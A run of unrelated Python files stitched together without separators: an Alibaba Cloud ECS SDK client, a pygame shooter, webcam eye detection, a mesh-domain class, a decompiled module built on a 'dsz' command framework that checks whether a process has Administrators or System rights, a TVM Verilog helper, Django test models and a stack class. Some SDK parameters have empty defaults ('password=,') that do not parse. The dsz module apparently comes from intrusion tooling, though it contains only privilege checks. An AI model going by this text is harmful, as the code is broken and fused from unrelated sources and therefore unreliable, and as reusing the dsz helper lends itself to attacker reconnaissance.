resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id} return self._handle_request(api_request).result def create_vswitch( self, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, vpc_id=None, vswitch_name=None, owner_account=None, cidr_block=None, zone_id=None, description=None, owner_id=None): api_request = APIRequest('CreateVSwitch', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "VpcId": vpc_id, "VSwitchName": vswitch_name, "OwnerAccount": owner_account, "CidrBlock": cidr_block, "ZoneId": zone_id, "Description": description, "OwnerId": owner_id} return self._handle_request(api_request).result def create_vpc( self, vpc_name=None, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, cidr_block=None, description=None, user_cidr=None, owner_id=None): api_request = APIRequest('CreateVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "VpcName": vpc_name, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "CidrBlock": cidr_block, "Description": description, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def create_snapshot( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, disk_id=None, snapshot_name=None, retention_days=None, list_of_tag=None, owner_id=None): api_request = APIRequest('CreateSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "DiskId": disk_id, "SnapshotName": snapshot_name, "RetentionDays": retention_days, "Tag": list_of_tag, "OwnerId": owner_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_security_group( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, owner_id=None, security_group_name=None, security_group_type=None, resource_group_id=None, region_id=None, vpc_id=None, list_of_tag=None): api_request = APIRequest('CreateSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "SecurityGroupName": security_group_name, "SecurityGroupType": security_group_type, "ResourceGroupId": resource_group_id, "RegionId": region_id, "VpcId": vpc_id, "Tag": list_of_tag} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_route_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, destination_cidr_block=None, owner_account=None, next_hop_id=None, owner_id=None, next_hop_type=None, list_of_next_hop_list=None, route_table_id=None): api_request = APIRequest('CreateRouteEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "DestinationCidrBlock": destination_cidr_block, "OwnerAccount": owner_account, "NextHopId": next_hop_id, "OwnerId": owner_id, "NextHopType": next_hop_type, "NextHopList": list_of_next_hop_list, "RouteTableId": route_table_id} repeat_info = { "NextHopList": ( 'NextHopList', 'list', 'dict', [ ('NextHopId', 'str', None, None), ('NextHopType', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_instance( self, resource_owner_id=None, hpc_cluster_id=None, security_enhancement_strategy=None, key_pair_name=None, spot_price_limit=None, deletion_protection=None, resource_group_id=None, host_name=None, password=, storage_set_partition_number=None, list_of_tag=None, auto_renew_period=None, node_controller_id=None, period=None, dry_run=None, owner_id=None, capacity_reservation_preference=None, vswitch_id=None, private_ip_address=None, spot_strategy=None, period_unit=None, instance_name=None, auto_renew=None, internet_charge_type=None, zone_id=None, internet_max_bandwidth_in=None, use_additional_service=None, affinity=None, image_id=None, client_token=, vlan_id=None, spot_interruption_behavior=None, io_optimized=None, security_group_id=None, internet_max_bandwidth_out=None, description=None, system_disk_category=None, capacity_reservation_id=None, system_disk_performance_level=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, list_of_arn=None, instance_charge_type=None, deployment_set_id=None, inner_ip_address=None, resource_owner_account=None, owner_account=None, tenancy=None, system_disk_disk_name=None, ram_role_name=None, dedicated_host_id=None, cluster_id=None, credit_specification=None, list_of_data_disk=None, storage_set_id=None, system_disk_size=None, system_disk_description=None): api_request = APIRequest('CreateInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "HpcClusterId": hpc_cluster_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "SpotPriceLimit": spot_price_limit, "DeletionProtection": deletion_protection, "ResourceGroupId": resource_group_id, "HostName": host_name, "Password": password, "StorageSetPartitionNumber": storage_set_partition_number, "Tag": list_of_tag, "AutoRenewPeriod": auto_renew_period, "NodeControllerId": node_controller_id, "Period": period, "DryRun": dry_run, "OwnerId": owner_id, "CapacityReservationPreference": capacity_reservation_preference, "VSwitchId": vswitch_id, "PrivateIpAddress": private_ip_address, "SpotStrategy": spot_strategy, "PeriodUnit": period_unit, "InstanceName": instance_name, "AutoRenew": auto_renew, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "UseAdditionalService": use_additional_service, "Affinity": affinity, "ImageId": image_id, "ClientToken": client_token, "VlanId": vlan_id, "SpotInterruptionBehavior": spot_interruption_behavior, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "CapacityReservationId": capacity_reservation_id, "SystemDisk.PerformanceLevel": system_disk_performance_level, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "Arn": list_of_arn, "InstanceChargeType": instance_charge_type, "DeploymentSetId": deployment_set_id, "InnerIpAddress": inner_ip_address, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Tenancy": tenancy, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "DedicatedHostId": dedicated_host_id, "ClusterId": cluster_id, "CreditSpecification": credit_specification, "DataDisk": list_of_data_disk, "StorageSetId": storage_set_id, "SystemDisk.Size": system_disk_size, "SystemDisk.Description": system_disk_description} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "Arn": ('Arn', 'list', 'dict', [('Rolearn', 'str', None, None), ('RoleType', 'str', None, None), ('AssumeRoleFor', 'str', None, None), ]), "DataDisk": ('DataDisk', 'list', 'dict', [('DiskName', 'str', None, None), ('SnapshotId', 'str', None, None), ('Size', 'str', None, None), ('Encrypted', 'str', None, None), ('PerformanceLevel', 'str', None, None), ('Description', 'str', None, None), ('Category', 'str', None, None), ('KMSKeyId', 'str', None, None), ('Device', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_image( self, list_of_disk_device_mapping=None, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, owner_id=None, platform=None, resource_group_id=None, instance_id=None, region_id=None, image_name=None, image_version=None, list_of_tag=None, architecture=None): api_request = APIRequest('CreateImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "DiskDeviceMapping": list_of_disk_device_mapping, "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "Platform": platform, "ResourceGroupId": resource_group_id, "InstanceId": instance_id, "RegionId": region_id, "ImageName": image_name, "ImageVersion": image_version, "Tag": list_of_tag, "Architecture": architecture} repeat_info = {"DiskDeviceMapping": ('DiskDeviceMapping', 'list', 'dict', [('SnapshotId', 'str', None, None), ('Size', 'str', None, None), ('DiskType', 'str', None, None), ('Device', 'str', None, None), ]), "Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_disk( self, resource_owner_id=None, snapshot_id=None, resource_owner_account=None, client_token=None, performance_level=None, owner_account=None, description=None, owner_id=None, disk_name=None, resource_group_id=None, instance_id=None, storage_set_id=None, size=None, encrypted=None, region_id=None, disk_category=None, zone_id=None, storage_set_partition_number=None, list_of_tag=None, list_of_arn=None, kms_key_id=None, advanced_features=None): api_request = APIRequest('CreateDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PerformanceLevel": performance_level, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "DiskName": disk_name, "ResourceGroupId": resource_group_id, "InstanceId": instance_id, "StorageSetId": storage_set_id, "Size": size, "Encrypted": encrypted, "RegionId": region_id, "DiskCategory": disk_category, "ZoneId": zone_id, "StorageSetPartitionNumber": storage_set_partition_number, "Tag": list_of_tag, "Arn": list_of_arn, "KMSKeyId": kms_key_id, "AdvancedFeatures": advanced_features} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), "Arn": ('Arn', 'list', 'dict', [('Rolearn', 'str', None, None), ('RoleType', 'str', None, None), ('AssumeRoleFor', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def copy_image( self, resource_owner_id=None, image_id=None, resource_owner_account=None, destination_image_name=None, destination_region_id=None, owner_account=None, owner_id=None, encrypted=None, region_id=None, list_of_tag=None, kms_key_id=None, destination_description=None): api_request = APIRequest('CopyImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "DestinationImageName": destination_image_name, "DestinationRegionId": destination_region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "Encrypted": encrypted, "RegionId": region_id, "Tag": list_of_tag, "KMSKeyId": kms_key_id, "DestinationDescription": destination_description} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def cancel_copy_image( self, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('CancelCopyImage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def authorize_security_group_egress( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, dest_group_id=None, owner_id=None, dest_group_owner_account=None, priority=None, dest_cidr_ip=None, dest_group_owner_id=None): api_request = APIRequest('AuthorizeSecurityGroupEgress', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "RegionId": region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "DestGroupId": dest_group_id, "OwnerId": owner_id, "DestGroupOwnerAccount": dest_group_owner_account, "Priority": priority, "DestCidrIp": dest_cidr_ip, "DestGroupOwnerId": dest_group_owner_id} return self._handle_request(api_request).result def authorize_security_group( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, source_group_owner_id=None, source_group_owner_account=None, region_id=None, ipv6_source_cidr_ip=None, ipv6_dest_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, owner_id=None, priority=None, dest_cidr_ip=None, source_group_id=None): api_request = APIRequest('AuthorizeSecurityGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "SourceGroupOwnerId": source_group_owner_id, "SourceGroupOwnerAccount": source_group_owner_account, "RegionId": region_id, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "OwnerId": owner_id, "Priority": priority, "DestCidrIp": dest_cidr_ip, "SourceGroupId": source_group_id} return self._handle_request(api_request).result def attach_disk( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, owner_account=None, disk_id=None, owner_id=None, device=None, delete_with_instance=None): api_request = APIRequest('AttachDisk', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DiskId": disk_id, "OwnerId": owner_id, "Device": device, "DeleteWithInstance": delete_with_instance} return self._handle_request(api_request).result def associate_eip_address( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, instance_type=None, allocation_id=None, owner_id=None): api_request = APIRequest('AssociateEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "InstanceType": instance_type, "AllocationId": allocation_id, "OwnerId": owner_id} return self._handle_request(api_request).result def allocate_public_ip_address( self, ip_address=None, resource_owner_id=None, instance_id=None, resource_owner_account=None, vlan_id=None, owner_account=None, owner_id=None): api_request = APIRequest('AllocatePublicIpAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "IpAddress": ip_address, "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "VlanId": vlan_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def allocate_eip_address( self, activity_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, bandwidth=None, client_token=None, internet_charge_type=None, isp=None, owner_account=None, owner_id=None): api_request = APIRequest('AllocateEipAddress', 'GET', 'http', 'RPC', 'query') api_request._params = { "ActivityId": activity_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Bandwidth": bandwidth, "ClientToken": client_token, "InternetChargeType": internet_charge_type, "ISP": isp, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result 0 import time, math import pygame as pg import config def spritecollide_sub(sprite, sub, dokill): ''' for quad_rect, tiles in sub.quadrants.items(): if sprite.rect.colliderect(quad_rect): for tile in pg.sprite.spritecollide(sprite, tiles, False): walls.add(*tile.room.walls)''' ''' quadrants = sprite.rect.collidelistall(sub.quadrant_rects) tiles = [tile for quad in quadrants for tile in sub.quadrant_tiles[quad]] walls = [wall for tile in tiles for wall in tile.room.walls] ''' walls = [wall for tile in pg.sprite.spritecollide(sprite, sub.tiles, False) for wall in tile.room.walls] collisions = pg.sprite.spritecollide(sprite, walls, dokill) return collisions #pg.init() # Necessary? class Player(pg.sprite.Sprite): size = 16 hitbox_size = math.sqrt(2 * size ** 2) def __init__(self, game, pos): super().__init__() self.game = game #self.game.all_sprites.add(self, layer=config.SPRITE_LAYER) self.pos = pg.Vector2(pos) self.vel = pg.Vector2() self.collisions = True self.image_base = pg.Surface((self.size, self.size), pg.SRCALPHA) self.image_base.fill(config.GREEN) self.rect = pg.Rect(0, 0, self.hitbox_size, self.hitbox_size) self.rect.center = self.pos - self.game.screen_pos self.rotation = 0 self.inventory = [None] * 9 self.inventory[0] = HandBlaster.from_owner(self) self._equipped_item = 0 self.equipped_item = 0 @property def equipped_item(self): return self.inventory[self._equipped_item] @equipped_item.setter def equipped_item(self, index): if self.equipped_item is not None: self.equipped_item.is_active = False self._equipped_item = index if self.equipped_item is not None: self.equipped_item.is_active = True def pickup_item(self, item): try: self.inventory[self.inventory.index(None)] = item item.owner = self item.is_item = False except IndexError: print("Inventory full: item not picked up.") def update(self): mouse = pg.mouse.get_pressed() keys = pg.key.get_pressed() num_keys = keys[pg.K_1:pg.K_9 + 1] if any(num_keys): self.equipped_item = num_keys.index(1) if mouse[0]: self.primary_action() #if keys[pg.K_e]: if keys[pg.K_a]: self.vel.x -= config.PLAYER_ACCEL if keys[pg.K_d]: self.vel.x += config.PLAYER_ACCEL if keys[pg.K_s]: self.vel.y += config.PLAYER_ACCEL if keys[pg.K_w]: self.vel.y -= config.PLAYER_ACCEL self.update_position() def update_position(self): self.rotation = (pg.Vector2(pg.mouse.get_pos()) - self.rect.center).angle_to((1, 0)) self.image = pg.transform.rotate(self.image_base, self.rotation) if self.vel.magnitude() > config.PLAYER_MAX_SPEED: self.vel.scale_to_length(config.PLAYER_MAX_SPEED) if self.vel.magnitude() > 0: self.vel -= self.vel * config.PLAYER_FRICTION if abs(self.vel.x) < config.PLAYER_MIN_VEL: self.vel.x = 0 if abs(self.vel.y) < config.PLAYER_MIN_VEL: self.vel.y = 0 center = self.rect.center self.rect.size = (self.hitbox_size, self.hitbox_size) self.rect.center = center self.rect.x += self.vel.x if self.collisions: #t1 = time.clock() #c = #print(time.clock() - t1) for wall in spritecollide_sub(self, self.game.sub, False): if self.vel.x > 0: self.rect.right = wall.rect.left elif self.vel.x < 0: self.rect.left = wall.rect.right self.vel.x = 0 self.rect.y += self.vel.y if self.collisions: for wall in spritecollide_sub(self, self.game.sub, False): if self.vel.y > 0: self.rect.bottom = wall.rect.top elif self.vel.y < 0: self.rect.top = wall.rect.bottom self.vel.y = 0 self.pos.update(self.game.screen_pos + self.rect.center) self.game.screen_pos.update(self.pos - config.SCREEN_MID) self.rect = self.image.get_rect(center=self.pos - self.game.screen_pos) ### unnecessary? def primary_action(self): if self.equipped_item is not None: self.equipped_item.action() class HandBlaster(pg.sprite.Sprite): size = (15, 5) cooldown = 100 def __init__(self, game, pos, rotation): super().__init__() self.game = game self.owner = None self.pos = pg.Vector2(pos) self.rotation = rotation self.image_base = pg.Surface(self.size, pg.SRCALPHA) self.image_base.fill(config.RED) self.image = pg.transform.rotate(self.image_base, self.rotation) self.rect = self.image.get_rect() self.rect.center = self.pos - self.game.screen_pos #self._pos_offset = (self.owner.size / 2, self.owner.size / 2) self.last_shot_time = pg.time.get_ticks() self.is_active = True self.is_item = True @classmethod def from_owner(cls, owner): instance = cls(owner.game, owner.pos, owner.rotation) instance.owner = owner instance._pos_offset = (owner.size / 2, owner.size / 2)#### instance.is_item = False return instance @property def is_item(self): return self._is_item @is_item.setter def is_item(self, value): self._is_item = value if self.is_item: self.game.items.add(self) self.owner = None self._pos_offset = 0 else: self.game.items.remove(self) self._pos_offset = (self.owner.size / 2, self.owner.size / 2) @property def is_active(self): return self._is_active @is_active.setter def is_active(self, value): self._is_active = value if self.is_active: self.game.all_sprites.add(self, layer=config.SPRITE_LAYER) self.update() ## else: self.game.all_sprites.remove(self) def update(self): if self.is_active: if self.owner is not None: self.move_to_owner() else: self.rect.center = self.pos - self.game.screen_pos def move_to_owner(self): # Sets the default position of the object (i.e. facing east) to be # at the owner's position with some offset so that it is placed at # the owner's side. self.pos = self.owner.pos + self._pos_offset # A vector describing the displacement from the radius, which the # object will be rotated about, to the object. radial_vector = self.pos - (self.game.screen_pos + self.owner.rect.center) # A vector describing the change in position as the radial vector is # rotated about the radius. self.change_vector = radial_vector.rotate(-(self.owner.rotation + 90)) - radial_vector # Applying the change in position. self.pos += self.change_vector # Applying the rotation to the image. self.image = pg.transform.rotate(self.image_base, self.owner.rotation) # Sets the rect's position to the new position. self.rect = self.image.get_rect(center=self.pos - self.game.screen_pos) def action(self): if pg.time.get_ticks() - self.last_shot_time > self.cooldown: mouse_pos = pg.Vector2(pg.mouse.get_pos()) if mouse_pos.distance_to(self.owner.rect.center) > 20: BlasterShot(self, mouse_pos - self.rect.center) self.last_shot_time = pg.time.get_ticks() class PlasmaRailCannon: pass class BlasterShot(pg.sprite.Sprite): size = 6 speed = 16 power = 5 max_range = 5000 max_bounces = 500 _number_of_checks = 2 def __init__(self, blaster, trajectory): super().__init__() self.game = blaster.game self.blaster = blaster self.game.all_sprites.add(self, layer=config.PROJECTILE_LAYER) self.add(self.game.projectiles) #offset = self.blaster.change_vector * 1 #offset.scale_to_length(self.blaster.change_vector.length() + 0) self.pos = self.blaster.pos self.vel = pg.Vector2(trajectory) self.vel.scale_to_length(self.speed) self.image = pg.Surface((self.size, self.size)) self.image.fill(config.GREEN) self.rect = self.image.get_rect() self.rect.center = self.pos - self.game.screen_pos self.bounces = 0 def update(self): self.update_position_bouncy() if self.pos.distance_to(self.game.player.pos) > self.max_range: self.kill() def update_position(self): for i in range(self._number_of_checks): self.pos += self.vel / self._number_of_checks self.rect.center = self.pos - self.game.screen_pos if spritecollide_sub(self, self.game.sub, False): self.kill() def update_position_bouncy(self): if self.bounces < self.max_bounces: for i in range(self._number_of_checks): self.pos.x += self.vel.x / self._number_of_checks self.rect.centerx = self.pos.x - self.game.screen_pos.x if spritecollide_sub(self, self.game.sub, False): self.vel.x *= -1 self.pos.x += self.vel.x / self._number_of_checks self.rect.centerx = self.pos.x - self.game.screen_pos.x self.bounces += 1 self.pos.y += self.vel.y / self._number_of_checks self.rect.centery = self.pos.y - self.game.screen_pos.y if spritecollide_sub(self, self.game.sub, False): self.vel.y *= -1 self.pos.y += self.vel.y #/ self._number_of_checks self.rect.centery = self.pos.y - self.game.screen_pos.y self.bounces += 1 else: self.kill() def main(): print("RUN THE OTHER ONE DAMMIT") if __name__ == "__main__": main() ShivanS93/VAtest_withOKN #!python3 # eye_detection.py - detect eyes using webcam # tutorial: https://www.roytuts.com/real-time-eye-detection-in-webcam-using-python-3/ import cv2 import math import numpy as np def main(): faceCascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml") eyeCascade = cv2.CascadeClassifier("haarcascade_eye.xml") # grab the reference to the webcam # try: vs = cv2.VideoCapture(0) print(vs) while True: ret, frame = vs.read() if frame is None: break gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) gray = cv2.equalizeHist(gray) faces = faceCascade.detectMultiScale(frame) for (x, y, w, h) in faces: roi_gray = gray[y : y + h, x : x + w] roi_color = frame[y : y + h, x : x + w] eyes = eyeCascade.detectMultiScale(roi_gray) for (ex, ey, ew, eh) in eyes: cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 0, 255), 2) cv2.imshow("Video", frame) key = cv2.waitKey(1) & 0xFF if key == ord("q") or key == 27: break cv2.destroyAllWindows() if __name__ == "__main__": main() import numpy as np from .domain import Domain class Channel(Domain): name = 'channel' left = 0 right = 5. bottom = 0 top = 5. num_blobs = 5 def __init__(self): self.x1 = 6*5/30 + 0.5*5/30 self.y1 = 0 self.s1 = 1. self.x2 = 0 self.y2 = 6*5/30 + 0.5*5/30 self.s2 = 1. def in_domain(self, X,Y): Xp = X.ravel() Yp = Y.ravel() d1 = -self.s1 * (Xp-self.x1) + (Yp-self.y1) d2 = -self.s2 * (Xp-self.x2) + (Yp-self.y2) bval = np.logical_and( d1 > 0 , d2 < 0 ) return bval.astype(int).reshape( X.shape ) def bc(self,x,y): idx = -np.ones( (x.size) ).astype(int) return idx def bc_id(self,bid): return bid[0] def vertex2bc(self, x, y): d1 = -self.s1 * (x-self.x1) + (y-self.y1) d2 = -self.s2 * (x-self.x2) + (y-self.y2) r1 = -1*(np.abs(d1)<1e-14) r2 = -1*(np.abs(d2)<1e-14) left = -2*(np.abs(x-self.left)<1e-14) right = -2*(np.abs(x-self.right)<1e-14) top = -2*(np.abs(y-self.top)<1e-14) bot = -2*(np.abs(y-self.bottom)<1e-14) bc = r1+r2+top+bot+left+right decided = np.where(np.logical_xor(np.logical_xor(np.logical_xor(np.logical_xor(np.logical_xor(r1, r2), top), bot), left), right)) out = np.zeros(x.shape) out[decided] = bc[decided] return out def curved_points(self,wgt,X1,Y1,X2,Y2): points = np.zeros( (X1.shape[0], wgt.size, 2) ) points[:,:,0] = wgt[None,:]*X1[:,None] + (1.-wgt[None,:])*X2[:,None] points[:,:,1] = wgt[None,:]*Y1[:,None] + (1.-wgt[None,:])*Y2[:,None] return points # uncompyle6 version 2.9.10 # Python bytecode 2.7 (62211) # Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10) # [GCC 6.2.0 20161005] # Embedded file name: __init__.py import dsz def _getWellKnownSid(name): x = dsz.control.Method() dsz.control.echo.Off() if not dsz.cmd.Run('sidlookup -wellknown %s' % name, dsz.RUN_FLAG_RECORD): return name name = dsz.cmd.data.Get('Sid::Name', dsz.TYPE_STRING) return name[0] def GetGroups(id=0): idStr = '' if id != 0: idStr = '-id %s' % id x = dsz.control.Method() dsz.control.echo.Off() if not dsz.cmd.Run('processinfo %s' % idStr, dsz.RUN_FLAG_RECORD): raise RuntimeError, 'Command failed' return dsz.cmd.data.Get('ProcessInfo::Groups::Group::Name', dsz.TYPE_STRING) def IsInAdminGroup(id=0): name = _getWellKnownSid('Administrators') return IsInGroup(name, id) def IsInGroup(groupName, id=0): name = groupName.lower() try: groups = GetGroups(id) for group in groups: if name == group.lower(): return True except: pass return False def IsInUsersGroup(id=0): name = _getWellKnownSid('Users') return IsInGroup(name, id) def IsSystem(id=0): name = _getWellKnownSid('System') user = dsz.process.GetUser(id) return user.lower() == name.lower()Lunderberg/tvm-vta100-1000 #!/usr/bin/env python # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os, sys import argparse def set_attrs(fname, fname_out, dsp=False, verbose=True): """Set attributes to precompiled verilog code to indicate synthesis preference. Parameters ---------- fname : str The name of input verilog source code file. fname_out : str The name of output verilog source code file. """ out = "" with open(fname, 'rt') as fp: module = '' for idx, line in enumerate(fp): if 'module' in line: module = line[line.find('module')+7:line.find('(')] out += line elif " * " in line: if dsp: line = line.replace(" * ", ' * (* multstyle="dsp" *) ') else: line = line.replace(" * ", ' * (* multstyle="logic" *) ') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line elif "rA;" in line: line = line.replace("rA;", 'rA /* synthesis noprune */;') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line elif "rB;" in line: line = line.replace("rB;", 'rB /* synthesis noprune */;') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line elif "rC;" in line: line = line.replace("rC;", 'rC /* synthesis noprune */;') if verbose: print(fname_out+":"+str(idx+1)+": "+module+":"+line[1:line.find(";")+1]) out += line else: out += line with open(fname_out, 'wt') as fp: fp.write(out) if __name__=="__main__": parser = argparse.ArgumentParser(description='Set attributes to precompiled ' + 'verilog code to indicate synthesis preference') parser.add_argument('-i', '--input', type=str, default='VTA.DefaultDe10Config.v', help='input verilog file to be decorated') parser.add_argument('-o', '--output', type=str, default='IntelShell.v', help='decorated verilog file') parser.add_argument('--dsp', default=False, action='store_true', help='use dsp instead of logic.') parser.add_argument('--verbose', default=False, action='store_true', help='print output file name and decorated lines.') args = parser.parse_args() set_attrs(args.input, args.output, args.dsp, args.verbose) from django.contrib.auth.models import AbstractBaseUser from django.db import models class CustomUserNonUniqueUsername(AbstractBaseUser): "A user with a non-unique username" username = models.CharField(max_length=30) USERNAME_FIELD = 'username' class Meta: app_label = 'auth' class CustomUserNonListRequiredFields(AbstractBaseUser): "A user with a non-list REQUIRED_FIELDS" username = models.CharField(max_length=30, unique=True) date_of_birth = models.DateField() USERNAME_FIELD = 'username' REQUIRED_FIELDS = 'date_of_birth' class Meta: app_label = 'auth' class CustomUserBadRequiredFields(AbstractBaseUser): "A user with a USERNAME_FIELD that appears in REQUIRED_FIELDS (invalid)" username = models.CharField(max_length=30, unique=True) date_of_birth = models.DateField() USERNAME_FIELD = 'username' REQUIRED_FIELDS = ['username', 'date_of_birth'] class Meta: app_label = 'auth' # LIFO Stack DS using Python Lists (Arrays) class StacksArray: def __init__(self): self.stackArray = [] def __len__(self): return len(self.stackArray) def isempty(self): return len(self.stackArray) == 0 def display(self): print(self.stackArray) def top(self): return self.stackArray[-1] def pop(self): if self.isempty(): print("Stack is empty") return None return self.stackArray.pop() def push(self, element): self.stackArray.append(element) if __name__ =='__main__': S = StacksArray() S.push(5) S.push(3) S.display() print(len(S)) print(S.pop()) print(S.isempty()) print(S.pop()) print(S.isempty()) S.push(7) S.push(9) print(S.top()) S.push(4) 